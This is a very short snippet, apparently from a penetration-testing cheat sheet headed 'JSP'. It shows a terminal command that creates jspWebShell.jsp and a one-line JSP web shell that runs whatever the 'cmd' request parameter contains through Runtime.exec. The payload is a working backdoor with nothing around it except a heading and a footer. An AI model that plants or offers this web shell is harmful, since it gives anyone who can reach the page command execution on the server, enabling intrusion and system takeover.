JSP

root@oco:~$ nano jspWebShell.jsp
 ...
 <% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
 ...

Last updated